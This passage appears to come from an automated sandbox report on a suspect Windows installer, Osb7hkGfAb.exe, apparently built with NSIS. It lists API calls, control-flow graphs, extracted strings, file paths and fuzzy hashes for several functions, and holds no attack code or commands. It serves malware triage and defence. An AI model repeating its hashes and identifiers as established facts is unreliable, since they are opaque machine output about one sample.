                                                                  • FindFirstFileA.KERNELBASE(76F93410,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,76F93410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76F93410,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                                  • FindClose.KERNELBASE(00000000), ref: 00406482
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID:
                                                                  • API String ID: 2295610775-0
                                                                  • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                  • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                                  • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                  • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                                  Function 004027A1 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 004027B0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: FileFindFirst
                                                                  • String ID:
                                                                  • API String ID: 1974802433-0
                                                                  • Opcode ID: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                                  • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                                  • Opcode Fuzzy Hash: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                                  • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A
                                                                  Function 0040390A Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 134 40390a-403922 call 406500 137 403924-403934 call 406055 134->137 138 403936-403967 call 405fde 134->138 147 40398a-4039b3 call 403bcf call 405b7d 137->147 143 403969-40397a call 405fde 138->143 144 40397f-403985 lstrcatA 138->144 143->144 144->147 152 4039b9-4039be 147->152 153 403a3a-403a42 call 405b7d 147->153 152->153 154 4039c0-4039e4 call 405fde 152->154 159 403a50-403a75 LoadImageA 153->159 160 403a44-403a4b call 40618a 153->160 154->153 161 4039e6-4039e8 154->161 163 403af6-403afe call 40140b 159->163 164 403a77-403aa7 RegisterClassA 159->164 160->159 165 4039f9-403a05 lstrlenA 161->165 166 4039ea-4039f7 call 405aba 161->166 178 403b00-403b03 163->178 179 403b08-403b13 call 403bcf 163->179 167 403bc5 164->167 168 403aad-403af1 SystemParametersInfoA CreateWindowExA 164->168 172 403a07-403a15 lstrcmpiA 165->172 173 403a2d-403a35 call 405a8f call 4060f7 165->173 166->165 171 403bc7-403bce 167->171 168->163 172->173 177 403a17-403a21 GetFileAttributesA 172->177 173->153 182 403a23-403a25 177->182 183 403a27-403a28 call 405ad6 177->183 178->171 187 403b19-403b33 ShowWindow call 406492 179->187 188 403b9c-403ba4 call 4052f0 179->188 182->173 182->183 183->173 195 403b35-403b3a call 406492 187->195 196 403b3f-403b51 GetClassInfoA 187->196 193 403ba6-403bac 188->193 194 403bbe-403bc0 call 40140b 188->194 193->178 197 403bb2-403bb9 call 40140b 193->197 194->167 195->196 200 403b53-403b63 GetClassInfoA RegisterClassA 196->200 201 403b69-403b9a DialogBoxParamA call 40140b call 40385a 196->201 197->178 200->201 201->171
                                                                  APIs
                                                                    • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                    • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                  • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,76F93410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Osb7hkGfAb.exe",00000000), ref: 00403985
                                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,76F93410), ref: 004039FA
                                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                  • GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                                    • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                  • RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
                                                                  • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
                                                                  • RegisterClassA.USER32(0042EBC0), ref: 00403B63
                                                                  • DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\tranchet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                  • API String ID: 1975747703-145829490
                                                                  • Opcode ID: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                                  • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                                  • Opcode Fuzzy Hash: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                                  • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D
                                                                  Function 00402EA1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 208 402ea1-402eef GetTickCount GetModuleFileNameA call 405c90 211 402ef1-402ef6 208->211 212 402efb-402f29 call 4060f7 call 405ad6 call 4060f7 GetFileSize 208->212 213 4030d1-4030d5 211->213 220 403014-403022 call 402e3d 212->220 221 402f2f 212->221 227 403024-403027 220->227 228 403077-40307c 220->228 222 402f34-402f4b 221->222 225 402f4d 222->225 226 402f4f-402f58 call 4032ea 222->226 225->226 234 40307e-403086 call 402e3d 226->234 235 402f5e-402f65 226->235 230 403029-403041 call 403300 call 4032ea 227->230 231 40304b-403075 GlobalAlloc call 403300 call 4030d8 227->231 228->213 230->228 254 403043-403049 230->254 231->228 259 403088-403099 231->259 234->228 238 402fe1-402fe5 235->238 239 402f67-402f7b call 405c4b 235->239 244 402fe7-402fee call 402e3d 238->244 245 402fef-402ff5 238->245 239->245 257 402f7d-402f84 239->257 244->245 250 403004-40300c 245->250 251 402ff7-403001 call 4065b7 245->251 250->222 258 403012 250->258 251->250 254->228 254->231 257->245 263 402f86-402f8d 257->263 258->220 260 4030a1-4030a6 259->260 261 40309b 259->261 264 4030a7-4030ad 260->264 261->260 263->245 265 402f8f-402f96 263->265 264->264 266 4030af-4030ca SetFilePointer call 405c4b 264->266 265->245 267 402f98-402f9f 265->267 271 4030cf 266->271 267->245 269 402fa1-402fc1 267->269 269->228 270 402fc7-402fcb 269->270 272 402fd3-402fdb 270->272 273 402fcd-402fd1 270->273 271->213 272->245 274 402fdd-402fdf 272->274 273->258 273->272 274->245
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00402EB2
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Osb7hkGfAb.exe,00000400), ref: 00402ECE
                                                                    • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405C94
                                                                    • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                  • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Osb7hkGfAb.exe,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00402F1A
                                                                  • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                  • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Osb7hkGfAb.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                  • API String ID: 2803837635-1820964199
                                                                  • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                  • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                                  • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                  • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D
                                                                  Function 0040618A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 275 40618a-406195 276 406197-4061a6 275->276 277 4061a8-4061be 275->277 276->277 278 4061c4-4061cf 277->278 279 4063af-4063b3 277->279 278->279 282 4061d5-4061dc 278->282 280 4061e1-4061eb 279->280 281 4063b9-4063c3 279->281 280->281 285 4061f1-4061f8 280->285 283 4063c5-4063c9 call 4060f7 281->283 284 4063ce-4063cf 281->284 282->279 283->284 287 4063a2 285->287 288 4061fe-406232 285->288 289 4063a4-4063aa 287->289 290 4063ac-4063ae 287->290 291 406238-406242 288->291 292 40634f-406352 288->292 289->279 290->279 295 406244-406248 291->295 296 40625c 291->296 293 406382-406385 292->293 294 406354-406357 292->294 300 406393-4063a0 lstrlenA 293->300 301 406387-40638e call 40618a 293->301 297 406367-406373 call 4060f7 294->297 298 406359-406365 call 406055 294->298 295->296 302 40624a-40624e 295->302 299 406263-40626a 296->299 313 406378-40637e 297->313 298->313 305 40626c-40626e 299->305 306 40626f-406271 299->306 300->279 301->300 302->296 303 406250-406254 302->303 303->296 309 406256-40625a 303->309 305->306 311 406273-40628e call 405fde 306->311 312 4062aa-4062ad 306->312 309->299 318 406293-406296 311->318 316 4062bd-4062c0 312->316 317 4062af-4062bb GetSystemDirectoryA 312->317 313->300 315 406380 313->315 319 406347-40634d call 4063d2 315->319 321 4062c2-4062d0 GetWindowsDirectoryA 316->321 322 40632d-40632f 316->322 320 406331-406334 317->320 323 406336-40633a 318->323 324 40629c-4062a5 call 40618a 318->324 319->300 320->319 320->323 321->322 322->320 325 4062d2-4062dc 322->325 323->319 330 40633c-406342 lstrcatA 323->330 324->320 327 4062f6-40630c SHGetSpecialFolderLocation 325->327 328 4062de-4062e1 325->328 333 40632a 327->333 334 40630e-406328 SHGetPathFromIDListA CoTaskMemFree 327->334 328->327 332 4062e3-4062ea 328->332 330->319 336 4062f2-4062f4 332->336 333->322 334->320 334->333 336->320 336->327
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004062B5
                                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                                  • SHGetSpecialFolderLocation.SHELL32(00405256,76F923A0,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                                  • SHGetPathFromIDListA.SHELL32(76F923A0,Call), ref: 00406312
                                                                  • CoTaskMemFree.OLE32(76F923A0), ref: 0040631E
                                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                                  • lstrlenA.KERNEL32(Call,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00424248,76F923A0), ref: 00406394
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                  • API String ID: 717251189-1230650788
                                                                  • Opcode ID: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                                  • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                                  • Opcode Fuzzy Hash: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                                  • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                                                                  Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 406 401759-40177c call 402bce call 405afc 411 401786-401798 call 4060f7 call 405a8f lstrcatA 406->411 412 40177e-401784 call 4060f7 406->412 417 40179d-4017a3 call 4063d2 411->417 412->417 422 4017a8-4017ac 417->422 423 4017ae-4017b8 call 40646b 422->423 424 4017df-4017e2 422->424 432 4017ca-4017dc 423->432 433 4017ba-4017c8 CompareFileTime 423->433 426 4017e4-4017e5 call 405c6b 424->426 427 4017ea-401806 call 405c90 424->427 426->427 434 401808-40180b 427->434 435 40187e-4018a7 call 40521e call 4030d8 427->435 432->424 433->432 436 401860-40186a call 40521e 434->436 437 40180d-40184f call 4060f7 * 2 call 40618a call 4060f7 call 405813 434->437 449 4018a9-4018ad 435->449 450 4018af-4018bb SetFileTime 435->450 447 401873-401879 436->447 437->422 469 401855-401856 437->469 451 402a63 447->451 449->450 453 4018c1-4018cc CloseHandle 449->453 450->453 456 402a65-402a69 451->456 454 4018d2-4018d5 453->454 455 402a5a-402a5d 453->455 458 4018d7-4018e8 call 40618a lstrcatA 454->458 459 4018ea-4018ed call 40618a 454->459 455->451 465 4018f2-402382 458->465 459->465 470 402387-40238c 465->470 471 402382 call 405813 465->471 469->447 472 401858-401859 469->472 470->456 471->470 472->436
                                                                  APIs
                                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 00401798
                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 004017C2
                                                                    • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,datastrrelsers Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,76F923A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,76F923A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                    • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,76F923A0), ref: 0040527A
                                                                    • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nswE071.tmp$C:\Users\user\AppData\Local\Temp\nswE071.tmp\System.dll$C:\Users\user\tranchet\Trykmaalere$Call
                                                                  • API String ID: 1941528284-1311833460
                                                                  • Opcode ID: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                                  • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                                  • Opcode Fuzzy Hash: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                                  • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                                                                  Function 004030D8 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 473 4030d8-4030ec 474 4030f5-4030fe 473->474 475 4030ee 473->475 476 403100 474->476 477 403107-40310c 474->477 475->474 476->477 478 40311c-403129 call 4032ea 477->478 479 40310e-403117 call 403300 477->479 483 4032d8 478->483 484 40312f-403133 478->484 479->478 485 4032da-4032db 483->485 486 403283-403285 484->486 487 403139-403182 GetTickCount 484->487 490 4032e3-4032e7 485->490 488 4032c5-4032c8 486->488 489 403287-40328a 486->489 491 4032e0 487->491 492 403188-403190 487->492 493 4032ca 488->493 494 4032cd-4032d6 call 4032ea 488->494 489->491 495 40328c 489->495 491->490 496 403192 492->496 497 403195-4031a3 call 4032ea 492->497 493->494 494->483 505 4032dd 494->505 499 40328f-403295 495->499 496->497 497->483 507 4031a9-4031b2 497->507 502 403297 499->502 503 403299-4032a7 call 4032ea 499->503 502->503 503->483 511 4032a9-4032b5 call 405d37 503->511 505->491 509 4031b8-4031d8 call 406625 507->509 514 40327b-40327d 509->514 515 4031de-4031f1 GetTickCount 509->515 517 4032b7-4032c1 511->517 518 40327f-403281 511->518 514->485 519 4031f3-4031fb 515->519 520 403236-403238 515->520 517->499 521 4032c3 517->521 518->485 522 403203-403233 MulDiv wsprintfA call 40521e 519->522 523 4031fd-403201 519->523 524 40323a-40323e 520->524 525 40326f-403273 520->525 521->491 522->520 523->520 523->522 528 403240-403247 call 405d37 524->528 529 403255-403260 524->529 525->492 526 403279 525->526 526->491 534 40324c-40324e 528->534 532 403263-403267 529->532 532->509 533 40326d 532->533 533->491 534->518 535 403250-403253 534->535 535->532
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$wsprintf
                                                                  • String ID: ... %d%%$HBB
                                                                  • API String ID: 551687249-372310663
                                                                  • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                  • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                                  • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                  • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                                                                  Function 00401E35 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00401E38
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                                  • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
